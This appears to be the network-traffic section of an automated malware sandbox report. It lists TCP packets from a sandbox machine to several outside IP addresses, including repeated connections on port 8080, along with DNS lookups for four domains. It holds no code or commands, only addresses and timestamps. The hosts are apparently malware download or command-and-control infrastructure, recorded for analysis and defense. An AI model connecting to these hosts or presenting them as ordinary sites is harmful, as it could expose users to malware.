                                                                            May 23, 2022 18:59:23.063116074 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063129902 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063133955 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063148022 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063150883 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063164949 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063182116 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063184977 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063213110 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063219070 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063242912 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063256979 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063263893 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063271999 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063275099 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063276052 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063292027 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063313007 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063504934 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063786983 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063793898 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063807011 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063827038 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.063851118 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063863993 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063868999 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.063874960 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.064043999 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.064060926 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.064086914 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.064105034 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.064121008 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.064441919 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.064709902 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065411091 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065431118 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065448046 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065464020 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065479994 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065495968 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065500975 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065512896 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065519094 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065524101 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065526009 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065532923 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065540075 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065551043 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065556049 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065567970 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065570116 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065587044 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065594912 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065598965 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065603018 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065612078 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065623999 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065635920 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065671921 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065691948 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065695047 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065732002 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.065937996 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065956116 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065972090 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065988064 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.065996885 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066005945 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066015005 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066019058 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066025972 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066039085 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066086054 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066112041 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066157103 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066179991 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066194057 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066442966 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066653967 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066673040 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066689014 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066703081 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066708088 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066715002 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066729069 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066765070 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.066926003 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066945076 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.066960096 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067001104 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067014933 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067018986 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067101955 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067131996 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067174911 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067413092 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067447901 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067465067 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067476034 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067492008 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067516088 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067610025 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067642927 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067656040 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067661047 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067687988 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067702055 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067784071 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067842007 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067857027 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067874908 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067887068 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067892075 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067903042 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067919970 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.067924023 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.067941904 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068336010 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068353891 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068378925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068396091 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068413019 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068413019 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068428993 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068432093 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068434954 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068438053 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068553925 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068562984 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068593025 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068689108 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068726063 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068892002 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068931103 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.068933010 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.068972111 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069211960 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069228888 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069246054 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069255114 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069262028 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069264889 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069287062 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069293022 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069617987 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069633961 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069673061 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069691896 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069693089 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069713116 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069714069 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069736004 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069753885 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069765091 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069807053 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069817066 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069835901 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069878101 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.069941998 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069986105 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.069987059 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070003033 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.070008039 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070024014 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070031881 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.070044041 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070050001 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.070071936 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070091963 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.070100069 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.070144892 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071564913 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071589947 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071618080 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071625948 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071634054 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071641922 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071645021 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071651936 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071659088 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071671963 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071676970 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071691036 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071698904 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071703911 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071708918 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071717024 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071722031 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071724892 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071738958 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071738958 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071753979 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071758032 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071774006 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071774960 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071793079 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071793079 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071811914 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071815014 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071835995 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071845055 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071852922 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071857929 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071870089 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071892023 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071896076 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071916103 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071918011 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071923018 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071933031 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071937084 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071950912 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071957111 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071968079 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071973085 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.071985960 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.071994066 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072004080 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072014093 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072021008 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072032928 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072038889 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072051048 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072055101 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072067976 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072072983 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072087049 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:23.072087049 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072104931 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.072119951 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:23.073118925 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:33.688708067 CEST8049176112.213.89.85192.168.2.22
                                                                            May 23, 2022 18:59:33.688914061 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 18:59:36.547590971 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:36.590539932 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:36.590658903 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:36.643388987 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:36.686274052 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:36.697211981 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:36.697248936 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:36.697457075 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:36.714771986 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:36.759748936 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:36.759895086 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:39.811964035 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:39.897581100 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:40.276212931 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:40.279340029 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.517622948 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.560424089 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:41.560534000 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.640686035 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.683578014 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:41.700330973 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:41.700371981 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:41.700491905 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.712414980 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:41.756984949 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:41.757168055 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:42.544188023 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:42.629511118 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:42.804775953 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:42.804918051 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:43.281168938 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:43.281198978 CEST808049177165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:43.281384945 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:45.806868076 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:45.806898117 CEST808049179165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:45.807086945 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.522670984 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.565642118 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:51.565720081 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.643196106 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.686146975 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:51.697051048 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:51.697086096 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:51.697137117 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.708622932 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:51.753293037 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:51.753480911 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:52.495820999 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:52.581537962 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:53.539546013 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:53.539627075 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.777848005 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.820283890 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:54.820516109 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.881377935 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.923671007 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:54.934510946 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:54.934542894 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:54.934658051 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.944308043 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:54.988272905 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:54.990976095 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:55.966989040 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:56.049237967 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:56.540038109 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:56.540062904 CEST808049180165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:56.540169954 CEST491808080192.168.2.22165.22.73.229
                                                                            May 23, 2022 18:59:57.252650023 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 18:59:57.252867937 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 19:00:00.251249075 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 19:00:00.251285076 CEST808049181165.22.73.229192.168.2.22
                                                                            May 23, 2022 19:00:00.252507925 CEST491818080192.168.2.22165.22.73.229
                                                                            May 23, 2022 19:00:16.932512999 CEST8049174188.132.217.108192.168.2.22
                                                                            May 23, 2022 19:00:16.932687998 CEST4917480192.168.2.22188.132.217.108
                                                                            May 23, 2022 19:01:06.494365931 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:06.494637966 CEST4917480192.168.2.22188.132.217.108
                                                                            May 23, 2022 19:01:06.549650908 CEST8049174188.132.217.108192.168.2.22
                                                                            May 23, 2022 19:01:07.097522020 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:08.298823118 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:10.498639107 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:14.898379087 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:23.728588104 CEST4917680192.168.2.22112.213.89.85
                                                                            May 23, 2022 19:01:26.489850044 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 19:01:26.489916086 CEST491778080192.168.2.22165.22.73.229
                                                                            May 23, 2022 19:01:31.312823057 CEST491798080192.168.2.22165.22.73.229
                                                                            May 23, 2022 19:01:31.312865973 CEST491798080192.168.2.22165.22.73.229

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            May 23, 2022 18:59:06.705910921 CEST5586853192.168.2.228.8.8.8
                                                                            May 23, 2022 18:59:06.723546982 CEST53558688.8.8.8192.168.2.22
                                                                            May 23, 2022 18:59:11.316231012 CEST4968853192.168.2.228.8.8.8
                                                                            May 23, 2022 18:59:11.335383892 CEST53496888.8.8.8192.168.2.22
                                                                            May 23, 2022 18:59:15.861249924 CEST5883653192.168.2.228.8.8.8
                                                                            May 23, 2022 18:59:16.193351030 CEST53588368.8.8.8192.168.2.22
                                                                            May 23, 2022 18:59:20.996893883 CEST5013453192.168.2.228.8.8.8
                                                                            May 23, 2022 18:59:21.307275057 CEST53501348.8.8.8192.168.2.22

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            May 23, 2022 18:59:06.705910921 CEST192.168.2.228.8.8.80x63a0Standard query (0)newkano.comA (IP address)IN (0x0001)
                                                                            May 23, 2022 18:59:11.316231012 CEST192.168.2.228.8.8.80x7c3Standard query (0)ocalogullari.comA (IP address)IN (0x0001)
                                                                            May 23, 2022 18:59:15.861249924 CEST192.168.2.228.8.8.80x446fStandard query (0)myphamcuatui.comA (IP address)IN (0x0001)
                                                                            May 23, 2022 18:59:20.996893883 CEST192.168.2.228.8.8.80x795Standard query (0)sieuthiphutungxenang.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            May 23, 2022 18:59:06.723546982 CEST8.8.8.8192.168.2.220x63a0No error (0)newkano.com103.45.230.202A (IP address)IN (0x0001)
                                                                            May 23, 2022 18:59:11.335383892 CEST8.8.8.8192.168.2.220x7c3No error (0)ocalogullari.com188.132.217.108A (IP address)IN (0x0001)
